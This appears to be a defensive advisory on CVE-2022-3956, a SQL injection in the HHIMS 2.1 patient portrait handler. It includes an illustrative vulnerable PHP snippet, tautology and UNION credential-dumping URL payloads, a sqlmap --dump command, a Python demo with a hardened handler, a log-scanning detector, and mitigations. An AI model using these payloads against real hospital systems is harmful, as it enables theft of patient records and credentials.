CVE-2022-3956 - Critical SQL Injection in tsruban HHIMS 2.1 Patient Portrait Handler (VDB-213462) – What You Need to Know
---
Introduction
A SQL injection flaw, tracked as CVE-2022-3956, was discovered in tsruban HHIMS 2.1, a healthcare management system. The vulnerability, rated critical, sits in the Patient Portrait Handler: the PID argument it receives is used to build a database query without adequate sanitization, and the attack can be initiated remotely. Left unpatched, it exposes sensitive patient data and the underlying database to remote attackers.
What’s tsruban HHIMS 2.1?
HHIMS stands for *Hospital Health Information Management System* and is used by healthcare providers for patient management. The flaw is inside the function that displays a patient's portrait photo when given a PID (Patient ID).
Vulnerability Details
- CVE ID: CVE-2022-3956
- VulDB ID: VDB-213462
- Affected product: tsruban HHIMS 2.1
- Affected component: Patient Portrait Handler
- Affected parameter: PID
- Vulnerability type: SQL injection
- Attack vector: remote
- Severity rating: critical
How the Vulnerability Occurs
Because the PID parameter is concatenated into a SQL statement without validation or parameter binding, an attacker who controls the request can change the structure of the query rather than just the value it compares against, and read or modify data the handler was never meant to expose.
A vulnerable PHP handler of this kind might look like the following (an illustrative reconstruction, not HHIMS's actual source):
```php
<?php
// PID is taken straight from the query string: ?PID=...
$pid = $_GET['PID'];

// The raw value is interpolated into the SQL text, so anything the
// attacker puts after the number becomes part of the statement.
$query = "SELECT photo FROM patients WHERE id = $pid";
$result = mysqli_query($conn, $query);

// Renders the image ...
?>
```
Here, $_GET['PID'] comes *directly* from the URL and is used in a SQL statement without validation or a prepared statement. An attacker can craft the PID parameter to inject arbitrary SQL, leading to data theft or modification and, depending on the privileges of the database account the application uses, to further compromise of the host.
A legitimate request fetches a single portrait:
```
https://hospital.example.com/hhims/patient-portrait.php?PID=1
```
A tautology turns the WHERE clause into a condition that matches every row:
```
https://hospital.example.com/hhims/patient-portrait.php?PID=1 OR 1=1
```
A UNION-based payload appends rows from another table to the result. The original query selects a single column, so the injected SELECT must return exactly one column as well; the `users` table and its columns below are illustrative, not a description of the HHIMS schema:
```
https://hospital.example.com/hhims/patient-portrait.php?PID=1 UNION SELECT CONCAT(username, ':', password) FROM users--
```
Browsers and tools URL-encode the spaces (as %20) before sending these requests.
A tool such as sqlmap can automate exploitation; `-p PID` limits testing to the vulnerable parameter:
```
sqlmap -u "https://hospital.example.com/hhims/patient-portrait.php?PID=1" -p PID --risk=3 --level=5 --dump
```
This command attempts to confirm the injection, enumerate the reachable databases and tables, and dump their contents. Run it only against systems you are authorized to test.
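The behaviour of the three requests above, reproduced in Python against an in-memory SQLite database. This is an added example, not code from the original post or from HHIMS: the `patients` and `users` tables, their columns and their rows are constructed for the demonstration, and the handler functions are stand-ins for the PHP handler. The vulnerable version interpolates PID into the query text exactly as the PHP snippet does; the hardened version allow-lists the parameter as a decimal integer and binds it as a query parameter.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample schema and data. Table and column names are assumptions
# borrowed from the PHP snippet, not the real HHIMS schema.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE patients (id INTEGER PRIMARY KEY, photo TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO patients VALUES (1, 'portrait-1.jpg'), (2, 'portrait-2.jpg');
        INSERT INTO users VALUES (1, 'admin', 's3cret-hash');
    """)
    return conn

def pid_from_url(url):
    """Return the raw PID query parameter, as $_GET['PID'] would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["PID"][0]

def vulnerable_portrait(conn, pid):
    """Mirrors the vulnerable handler: the raw parameter is spliced into SQL."""
    query = f"SELECT photo FROM patients WHERE id = {pid}"
    return [row[0] for row in conn.execute(query)]

def hardened_portrait(conn, pid):
    """Allow-list the identifier's shape, then bind it as a parameter.

    Binding alone already defeats the injection; the shape check additionally
    rejects junk early and gives a clean error instead of a database error.
    """
    if not re.fullmatch(r"[0-9]+", pid):
        raise ValueError("PID must be a decimal integer")
    rows = conn.execute("SELECT photo FROM patients WHERE id = ?", (int(pid),))
    return [row[0] for row in rows]

BASE = "https://hospital.example.com/hhims/patient-portrait.php?PID="
REQUESTS = {
    "benign": BASE + "1",
    "tautology": BASE + "1 OR 1=1",
    # SQLite concatenates with ||; the MySQL equivalent is CONCAT(username, ':', password).
    "union": BASE + "1 UNION SELECT username || ':' || password FROM users--",
}

def demo():
    """Run each request through both handlers and collect the outcomes."""
    conn = build_db()
    results = {"vulnerable": {}, "hardened": {}}
    for name, url in REQUESTS.items():
        pid = pid_from_url(url)
        results["vulnerable"][name] = sorted(vulnerable_portrait(conn, pid))
        try:
            results["hardened"][name] = sorted(hardened_portrait(conn, pid))
        except ValueError:
            results["hardened"][name] = "rejected"
    return results

if __name__ == "__main__":
    for mode, outcomes in demo().items():
        for name, value in outcomes.items():
            print(f"{mode:10} {name:10} -> {value}")
```

Against the vulnerable handler the tautology returns every portrait and the UNION payload returns the constructed `admin` credential alongside the portrait; the hardened handler serves the benign request and rejects both payloads before they reach the database.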
Impact
- Leak of patient records
- Compromise of user/admin accounts
Mitigation
- Check for patches or updates from tsruban's developers and apply them.
- Where the code can be changed, rewrite the handler to validate PID as an integer and pass it to the database through a prepared statement rather than string concatenation.
- Run the application with a database account that has only the privileges the handler needs, so a successful injection cannot reach unrelated tables.
- Review web server logs for requests to the portrait handler whose PID value is not a plain number.
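The log review suggested above, as an added detection example that is not part of the original post. It parses access-log lines in the common combined format, decodes the PID parameter of each request, and flags values that are not a plain decimal integer, values containing SQL syntax, and requests carrying a sqlmap user agent. The log lines are constructed for the example; the IPs, timestamps and paths are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (Apache/Nginx combined format). The PID values
# mirror the request examples discussed above; hosts and IPs are made up.
SAMPLE_LOG = r"""
203.0.113.7 - - [11/Nov/2022:16:20:01 +0000] "GET /hhims/patient-portrait.php?PID=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2022:16:20:04 +0000] "GET /hhims/patient-portrait.php?PID=1%20OR%201%3D1 HTTP/1.1" 200 9830 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Nov/2022:16:21:10 +0000] "GET /hhims/patient-portrait.php?PID=1%20UNION%20SELECT%20CONCAT(username,':',password)%20FROM%20users-- HTTP/1.1" 200 611 "-" "sqlmap/1.6.11#stable (https://sqlmap.org)"
198.51.100.23 - - [11/Nov/2022:16:21:11 +0000] "GET /hhims/patient-portrait.php?PID=1)%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 5123 "-" "sqlmap/1.6.11#stable (https://sqlmap.org)"
203.0.113.9 - - [11/Nov/2022:16:22:30 +0000] "GET /hhims/patient-portrait.php?PID=42 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# One combined-format line: client, identity, user, [timestamp], "METHOD target PROTO", status, size, "referer", "user agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Tokens that have no business in a numeric identifier.
SQL_TOKENS = re.compile(r"\b(UNION|SELECT|SLEEP|BENCHMARK|OR|AND)\b|--|/\*|'", re.IGNORECASE)

def classify(line):
    """Parse one log line; return a record with the reasons it looks suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes, so %20 and %3D become the characters the
    # application actually saw.
    pid_values = parse_qs(urlsplit(m["target"]).query).get("PID", [])
    reasons = []
    for pid in pid_values:
        if not re.fullmatch(r"[0-9]+", pid):
            reasons.append(f"non-numeric PID {pid!r}")
            if SQL_TOKENS.search(pid):
                reasons.append("SQL syntax in PID")
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap user agent")
    return {"ip": m["ip"], "ts": m["ts"], "pid": pid_values, "reasons": reasons}

def scan(log_text):
    """Return the suspicious records, in log order."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = classify(line)
        if rec and rec["reasons"]:
            findings.append(rec)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:15}  {'; '.join(f['reasons'])}")
```

Of the five constructed lines, three are flagged: the tautology from 203.0.113.7 and both sqlmap requests from 198.51.100.23; the two plain numeric PIDs pass. The integer check does the real work, since any payload has to leave the decimal-digit alphabet to alter the query.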
The vulnerability is tracked in VulDB under the identifier VDB-213462.
References
- National Vulnerability Database: CVE-2022-3956
- VulDB Entry: VDB-213462
- OWASP SQL Injection Prevention Cheat Sheet
Summary
A critical SQL injection flaw, CVE-2022-3956, in the Patient Portrait Handler of tsruban HHIMS 2.1 puts sensitive healthcare data and the underlying database at risk, and the attack can be initiated remotely without login credentials. The fastest way to stay safe is to apply the vendor's patch as soon as it is available, check your codebase for any unsanitized input reaching SQL statements, and use prepared statements throughout.
Timeline
Published on: 11/11/2022 16:15:00 UTC
Last modified on: 11/16/2022 15:46:00 UTC